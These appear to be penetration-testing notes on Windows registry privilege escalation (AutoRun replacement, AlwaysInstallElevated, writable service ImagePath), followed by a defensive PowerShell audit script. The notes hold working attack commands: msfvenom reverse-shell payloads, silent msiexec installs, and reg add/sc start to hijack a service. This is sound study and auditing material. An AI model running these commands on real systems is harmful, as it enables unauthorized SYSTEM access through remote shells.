Registry

AUTORUN:

Your enumeration scripts will give you a list of AutoRun programs; winPEAS shows them under AutoRun applications. Check whether you have RW access to those program binaries. Create a malicious executable for the AutoRun program and replace the original one. This, however, requires a restart of the machine for the AutoRun to give you a shell, which means you will only get a shell when the Administrator logs into his account. The administrator receives a prompt to run the program; once he accepts the prompt, you get a reverse shell.

ALWAYS INSTALL ELEVATED:

Windows has installer packages called MSI packages; an MSI is basically a Windows Installer file. For the exploit to work, two registry settings need to be enabled. Query both keys:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

reg query HKCU\Software\Policies\Microsoft\Windows\Installer

Check that AlwaysInstallElevated is set to 1 under both keys (the setting only takes effect when both are 1).

METHOD 1:

Run PowerUp.ps1 and use its Abuse function to add a user or perform some other task.

METHOD 2:

Create a Metasploit reverse-shell MSI, transfer it to the machine and run it.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f msi -o shell.msi
#Transfer it to the victim machine and run it (the file name must match the one generated above):
msiexec /quiet /qn /i C:\Temp\shell.msi

METHOD 3:

#Get a meterpreter shell, then background the session:
background
#Use the exploit module
use exploit/windows/local/always_install_elevated
#Then set SESSION to the id of the backgrounded session and run it

REGSVC:

winPEAS: Looking if you can modify any service registry

#Suppose that the registry is:
HKLM\system\currentcontrolset\services\regsvc (Interactive [TakeOwnership])

#Verify the permissions of the service key (accesschk takes a plain HKLM\ path, not the PowerShell HKLM: drive):
#CMD
accesschk /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

#POWERSHELL
Get-Acl HKLM:\System\CurrentControlSet\Services\regsvc | Format-List

#Check if we can start the service
accesschk /accepteula -ucqv user regsvc

#Query the service info (reg.exe also takes a plain HKLM\ path)
reg query HKLM\System\CurrentControlSet\Services\regsvc

#Create a reverse shell and transfer it to C:\Temp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ip LPORT=1234 -f exe -o shell.exe

#Run the following command
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\shell.exe /f

#Start a listener and the service
sc start regsvc
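The two checks above (AlwaysInstallElevated in both hives, and service keys writable by low-privilege principals) can be audited from the defender's side with the following PowerShell, added here and not part of the original notes or winPEAS; it only reports, assumes Windows PowerShell 5+ on the host, and the list of "low-privilege" principals is my assumption.

```powershell
# Added audit helpers (not from the original notes). Run as the low-privilege
# account you are assessing; key paths are the ones quoted in the notes above.

function Test-AlwaysInstallElevated {
    # The policy is only effective when BOTH the machine and user values are 1.
    $read = {
        param($Path)
        (Get-ItemProperty -Path $Path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    $hklm = & $read 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
    $hkcu = & $read 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
    [pscustomobject]@{
        HKLM    = $hklm
        HKCU    = $hkcu
        Enabled = ($hklm -eq 1 -and $hkcu -eq 1)   # if true, MSI installs run as SYSTEM
    }
}

function Get-WritableServiceKeys {
    # Service keys where a low-privilege principal can change values such as
    # ImagePath, take ownership or rewrite the ACL. Every hit is a finding:
    # reset the key ACL (Set-Acl or a security template) and audit the key.
    $lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'NT AUTHORITY\INTERACTIVE')   # assumption: treat these as untrusted
    $r = [System.Security.AccessControl.RegistryRights]
    $writeMask = $r::SetValue -bor $r::CreateSubKey -bor $r::Delete -bor
                 $r::ChangePermissions -bor $r::TakeOwnership -bor $r::FullControl
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $key = $_
            $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
            if (-not $acl) { return }   # key not readable by this account; skip it
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $lowPriv -contains $ace.IdentityReference.Value -and
                    (([int]$ace.RegistryRights) -band ([int]$writeMask)) -ne 0) {
                    [pscustomobject]@{
                        Service  = $key.PSChildName
                        Identity = $ace.IdentityReference.Value
                        Rights   = $ace.RegistryRights
                    }
                }
            }
        }
}

Test-AlwaysInstallElevated
Get-WritableServiceKeys | Format-Table -AutoSize
```

A key such as the regsvc example above would show up in the second table with Interactive and TakeOwnership; an empty table and Enabled = False mean neither path described in these notes is open on the host.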
